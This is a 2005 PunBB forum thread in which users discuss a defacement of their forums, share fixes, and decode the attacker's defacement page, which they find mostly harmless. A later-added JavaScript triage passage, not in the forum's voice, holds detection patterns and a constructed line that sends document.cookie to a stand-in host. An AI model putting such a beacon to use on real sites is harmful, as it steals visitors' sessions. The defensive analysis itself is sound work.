Re: Hacked by Altan

Tobi wrote:
someguy wrote:

Unfortunately it's still not working for me. :(

OK, to see if your path is correct you can just leave out the authentication part and only call the file:

...
This will show you if the file is found and parsed correctly.
If yes then it must have to do with your server settings.

:( When I do this, the page loads without even requesting a username/password.  BTW, thanks for your help on this.

77

Re: Hacked by Altan

someguy wrote:

:( When I do this, the page loads without even requesting a username/password.

Of course it does.
This is only meant to find out if the path is correct. The page should load and it should print somewhere the username and Password.

The German PunBB Site:
PunBB-forum.de

Re: Hacked by Altan

Rickard wrote:
MathsIsFun wrote:

(BTW it wouldn't let me type my address on Firefox, but went through in IE)

Huh? I'm not sure I understand.

Maybe it's just me, but when I open http://punbb.org/newsletter.php in Firefox, and try to type in an email address it keeps popping me out of the box. I have found that if I click in the box and keep my finger on the left mouse button then I can type. Strange. Works fine in IE6.

Re: Hacked by Altan

Yes, you're right. What the? :)

"Programming is like sex: one mistake and you have to support it for the rest of your life."

Re: Hacked by Altan

Fixed it. I had placed a hidden form element inside the label for the e-mail field. E.g:

<label><strong>E-mail address</strong><br />
<input type="hidden" name="form_sent" value="1" />
<input type="text" name="req_email" size="50" maxlength="80" /><br /></label>

That's not a good idea :)


Re: Hacked by Altan

Tobi wrote:
someguy wrote:

:( When I do this, the page loads without even requesting a username/password.

Of course it does.
This is only meant to find out if the path is correct. The page should load and it should print somewhere the username and Password.

Perhaps I wasn't specific enough.  When I make the suggested changes, it doesn't ask me for a username and password; it just loads the page and does not display any additional info.  In fact, it doesn't even look like it is entering the "else" part of the if/else statement.  If I place echo "JUNK"; before the "} else", I see JUNK displayed on the page.  I assume this is a server setting issue.

82

Re: Hacked by Altan

OK,
then just make an empty file in the pun installation directory.

Write there

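<?php
// Read the first line of the password file and split it into user and password.
$auth = file("./admin_pass.pwd");
// explode() replaces split(), which was removed in PHP 7.
list($user, $password) = explode(":", trim($auth[0]), 2);
echo "User is $user and password is $password";
?>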

make sure the path to admin_pass.pwd is correct
and see if it displays anything.


83

Re: Hacked by Altan

Damn, too many forums to keep up with. That newsletter ought to help Rickard - thanks!

Hacked just yesterday - lost 2 forums. Have upgraded to 1.2.6 (yeah I know...), and applied the changes for checking during the registration process as well as the Admin security Mod supplied by Tobi. I've also added an htaccess file to my Punbb install which blocks anyone from the IP block of 81.214.0.0 from even getting access to my site. Had to do the same for a block in Germany - 84.165.0.0.

Have I missed something that needs/should be changed to protect my forums?

84

Re: Hacked by Altan

I've downloaded and installed v1.2.7

The changelog indicates a few vulnerabilities were fixed. Are we reasonably sure that this latest version is tight without the need to add the security mods posted earlier in this thread?

Re: Hacked by Altan

We are always unsure that it is secure. We thought 1.2.6 was secure but it wasn't, which is why 1.2.7 is released. The good news is there are no known problems with 1.2.7, and if there are problems, chances are Smartys or someone else who is not on the "dark side" will find it and alert Rickard before there is mass hacking. It's just the way the internet is.

86

Re: Hacked by Altan

Am I correct that the vulnerability fixed in 1.2.7 only affects forums with register_globals on?

Re: Hacked by Altan

If by "the vulnerability" you mean the one in search, yes
If you mean the ones in the admin interface, I'd have to check, but I don't think it matters

88

Re: Hacked by Altan

>> just the way the Inet is

Understood - I know there are no absolutes. :) Your answer is what I was looking for - that as far as we know the latest upgrade fixed the known holes.

Re: Hacked by Altan

Basically, keep backups as regular as possible (check with your host; many take backups anyway and will help you out if you get into problems), keep up to date, don't make people you don't know admins, and that's the best you can do really.

Re: Hacked by Altan

Tobi wrote:

OK,
then just make an empty file in the pun installation directory.

Write there

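<?php
// Read the first line of the password file and split it into user and password.
$auth = file("./admin_pass.pwd");
// explode() replaces split(), which was removed in PHP 7.
list($user, $password) = explode(":", trim($auth[0]), 2);
echo "User is $user and password is $password";
?>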

make sure the path to admin_pass.pwd is correct
and see if it displays anything.

Thanks for sticking with me on this.  When I make the suggested test file, it loads fine and shows the contents of my admin_pass.pwd file just fine.

91

Re: Hacked by Altan

So that means you can open and read the file but the .htaccess functions do not work.
This sounds like some trouble with the web server configuration.
Since I can't know about that maybe you ask your host if there's anything he can do.
Sorry for not having better news....


Re: Hacked by Altan

Tobi wrote:

So that means you can open and read the file but the .htaccess functions do not work.
This sounds like some trouble with the web server configuration.
Since I can't know about that maybe you ask your host if there's anything he can do.
Sorry for not having better news....

Yeah... I figured as much.  Thanks for the help.

93

Re: Hacked by Altan

Now I have gotten paranoid and banned the IP series 81.212-215.*.* in PunBB.
Adding this in bans should ban them all: "81.212 81.213 81.214 81.215"?
Because my page is in Swedish I don't think any of the other Turks on the same IP series mind..

I probably registered before you, sucker!

94

Re: Hacked by Altan

BTW I got hit by the same hack from a different IP series: 85.100.230.111, so it may be worthwhile to add 85.100 to the above string.

Re: Hacked by Altan

Well, I was bored, found out where he had that image hosted, and emailed their abuse email

Thank you for informing us.  The site has been terminated.

Regards,

Domain DLX Abuse Department

Small victory, but I was bored :P

96

Re: Hacked by Altan

I saw the "Maintenance Mode" code earlier in the thread.  What the hacker put into my "Maintenance Mode" page seems much more malicious. Anyone with Javascript experience have an idea what this would have done had a user visited the site while it was on main't mode?

<HTML>
<HEAD>
<TITLE>Hacked by ALTANs - System Fucker</TITLE>
<META NAME="description" CONTENT="Bizim Gerçek K?ld?klar?m?za Onlar hayalleriyle Eri?emedi">
<META NAME="author" CONTENT="ALTANs"> 
<LINK REV="made" href="mailto:turkogluturk18@hotmail.com">
<META http-equiv=Content-Type content="text/html; charset=windows-1254">
<META content="MSHTML 6.00.2900.2722" name=GENERATOR></HEAD>
<BODY text=#000080 vLink=#000080 aLink=#000080 link=#000080 bgColor=#ffffff onload=init()>
<P align=center>
<DIV class=ttl1 id=ttl0>
<SCRIPT language=JavaScript>
var message="";
/////////////////////////////////// sa? tu? close 
function clickIE() {if (document.all) {(message);return false;}}
function clickNS(e) {if 
(document.layers||(document.getElementById&&!document.all)) {
if (e.which==2||e.which==3) {(message);return false;}}}
if (document.layers) 
{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;} 
  </SCRIPT>
</DIV><BR>
<META http-equiv=Content-Language content=tr>
<STYLE type=text/css>B {
    FONT-WEIGHT: bold
}
#ttl0 {
    POSITION: absolute
}
.ttl1 {
    FONT: 8pt Verdana,Arial,Helvetica,serif
}
.p {
    color : #000080;
}
.d {
    color : #000000;
    background-color : #ffff00;
}
</STYLE>
<SCRIPT language=JAVASCRIPT type=text/javascript>var layers=document.layers,style=document.all,both=layers||style,idme=908601;if(layers){layerRef='document.layers';styleRef='';}if(style){layerRef='document.all';styleRef='.style';}function writeOnText(obj,str){if(layers)with(document[obj]){document.open();document.write(str);document.close();}if(style)eval(obj+'.innerHTML= str');}var dispStr=new Array("<font color=008000><!--#include file="database.asp"--></font><br><font color=008000><!--#include file="Server-CreateObject.asp"--></font><br><br><font class=d><%</font></b><br><font color=000080>If <b>hacked</b>.eof <b>then</b><br><font color=000080>Response.Write (" This Web Page Hacked ") <br>Response.Write ("<font color=800080><b> Hacked by ALTANs </b></font>") </b><font color=000080><br>Response.Write (" RSA key fingerprint : 4f:b8:e8:83:h7:82:1g:t4:2e:49:72:41:f2:19:66:ea ")<br>Response.Write (" Are you sure you want to continue connecting (yes/no)? ")<br>Response.Write (" yes ")<br>Response.Write (" Root: ALTANs  ")<br>Response.Write (" password: ******* ")<br>Response.Write (" Md5  : 3f3082fd88c694198de78162285940bf  ")<br>Response.Write (" Checksum : <b> --->> Game Ower :) </b>  ")<br><b>End If</b><br><font class=d>%></font><br><br><br><br><center><b> www.SanalDevrim.net <br> altan@sanaldevrim.net </center></p><br><br>"
);var overMe=0;function txtTyper(str,idx,idObj,spObj,clr1,clr2,delay,plysnd){var tmp0=tmp1='',skip=0;if(both&&idx<=str.length){if(str.charAt(idx)=='<'){while(str.charAt(idx)!='>')idx++;idx++;}if(str.charAt(idx)=='&'&&str.charAt(idx+1)!=' '){while(str.charAt(idx)!=';')idx++;idx++;}tmp0=str.slice(0,idx);tmp1=str.charAt(idx++);if(overMe==0&&plysnd==10){if(navigator.plugins[0]){if(navigator.plugins["LiveAudio"][100].type=="audio/basic"&&navigator.javaEnabled()){document.embeds[0].stop();setTimeout("document.embeds[0].play(false)",10000);}}else if(document.all){ding.Stop(100);setTimeout("ding.Run()",100);}overMe=1;}else overMe=0;writeOnText(idObj,"<span class="+spObj+"><font color='"+clr1+"'>"+tmp0+"</font><font color='"+clr2+"'>"+tmp1+"</font></span>");setTimeout("txtTyper('"+str+"', "+idx+", '"+idObj+"', '"+spObj+"', '"+clr1+"', '"+clr2+"', "+delay+" ,"+plysnd+")",delay);}}function init(){txtTyper(dispStr[0],0,'ttl0','ttl1','#00ff60 ','#40ff60',50,0);}</SCRIPT>
</BODY></HTML>

97 (edited by Smartys 2005-09-11 00:32)

Re: Hacked by Altan

rofl :P
Not malicious, trying to be 1337 (at least as far as I see) :P

The text it displays:

<!--#include file="database.asp"-->
<!--#include file="Server-CreateObject.asp"-->

<%
If hacked.eof then
Response.Write (" This Web Page Hacked ") 
Response.Write (" Hacked by ALTANs ") 
Response.Write (" RSA key fingerprint : 4f:b8:e8:83:h7:82:1g:t4:2e:49:72:41:f2:19:66:ea ")
Response.Write (" Are you sure you want to continue connecting (yes/no)? ")
Response.Write (" yes ")
Response.Write (" Root: ALTANs ")
Response.Write (" password: ******* ")
Response.Write (" Md5 : 3f3082fd88c694198de78162285940bf ")
Response.Write (" Checksum : --->> Game Ower :) ")
End If
%>




www.SanalDevrim.net 
altan@sanaldevrim.net

Edit: Now then, let's see what their hosting company says about that site :)

98

Re: Hacked by Altan

It just seemed to be doing a lot more than the previous code did.  I know nothing on JS at all.  I'm assuming it played some sounds.  Does the script seem to be sending data somewhere when it runs?  That was my concern.

99 (edited by Smartys 2005-09-11 00:46)

Re: Hacked by Altan

I didn't hear any sounds, and from what I've seen it doesn't appear to be sending anything anywhere, just writing that text

Edit: http://www.whois.sc/sanaldevrim.net
Yay for Turkish registrars!
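
A static first pass over a saved copy of such a page is one way to answer the question raised above: does the script send anything anywhere, or does it only write text? This is an added example, not code from the thread; the rule list, the function name `triage` and both sample pages are constructed for illustration, the first modelled loosely on the typewriter script posted earlier.

```javascript
// Added example: static triage of the inline scripts in a saved page.
// The rule list is an illustrative assumption, not a complete detector.
const RULES = [
  { kind: 'network', name: 'XMLHttpRequest/ActiveX', re: /XMLHttpRequest|ActiveXObject/ },
  { kind: 'network', name: 'fetch/sendBeacon', re: /\bfetch\s*\(|sendBeacon\s*\(/ },
  { kind: 'network', name: 'image beacon', re: /new\s+Image\b|\.src\s*=/ },
  { kind: 'network', name: 'navigation', re: /location(\.href)?\s*=[^=]|location\.(replace|assign)\s*\(/ },
  { kind: 'network', name: 'form submit', re: /\.submit\s*\(/ },
  { kind: 'data', name: 'cookie access', re: /document\.cookie/ },
  { kind: 'dynamic', name: 'eval', re: /\beval\s*\(/ },
  { kind: 'dynamic', name: 'string timer', re: /set(Timeout|Interval)\s*\(\s*["']/ },
  { kind: 'dom', name: 'DOM write', re: /document\.write\s*\(|\.innerHTML\s*=/ },
  { kind: 'media', name: 'sound playback', re: /LiveAudio|\.embeds\[|\.play\s*\(/ },
];

// Constructed sample, modelled on the typewriter script posted in the thread.
const TYPEWRITER_PAGE = `<BODY onload=init()>
<SCRIPT language=JavaScript>
var style=document.all;
function writeOnText(obj,str){if(style)eval(obj+'.innerHTML= str');}
var dispStr=new Array("<b>Hacked by EXAMPLE</b><br>www.example.invalid");
function txtTyper(str,idx,idObj,delay){
  writeOnText(idObj,str.slice(0,idx));
  if(navigator.plugins["LiveAudio"])document.embeds[0].play(false);
  if(idx<str.length)setTimeout("txtTyper('"+str+"',"+(idx+1)+",'"+idObj+"',"+delay+")",delay);
}
function init(){txtTyper(dispStr[0],0,'ttl0',50);}
</SCRIPT></BODY>`;
// Constructed positive control: a script that does send data off the page.
const BEACON_PAGE = `<script>new Image().src="http://collector.example.invalid/c?d="+document.cookie;</script>`;

function triage(html) {
  const scripts = [...html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script>/gi)].map(m => m[1]);
  // Inline handlers such as onload=init() are entry points as well.
  const handlers = [...html.matchAll(/\son\w+\s*=\s*["']?([^"'\s>]+)/gi)].map(m => m[1]);
  const code = scripts.concat(handlers).join('\n');
  const findings = RULES.filter(r => r.re.test(code)).map(({ kind, name }) => ({ kind, name }));
  const kinds = new Set(findings.map(f => f.kind));
  return {
    scripts: scripts.length, handlers, findings,
    urls: [...new Set(code.match(/https?:\/\/[^\s"'<>)]+/g) || [])],
    mayContactNetwork: kinds.has('network'),
    needsManualReview: kinds.has('dynamic'), // eval and string timers run built strings
  };
}

console.log(JSON.stringify(triage(TYPEWRITER_PAGE), null, 2));
console.log(JSON.stringify(triage(BEACON_PAGE), null, 2));
```

Pattern matching does not see through obfuscation, so a `needsManualReview` hit means reading what the evaluated strings are built from before trusting the `mayContactNetwork` result.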

100

Re: Hacked by Altan

I got hit this morning from 85.100.230.111.  He erased 2 forums too.  :(

I was lagging on updating - stupid me.

I'm hoping my host can restore them.

If not, is there anything I need to change in the db or look for to see if he changed anything?

thanks..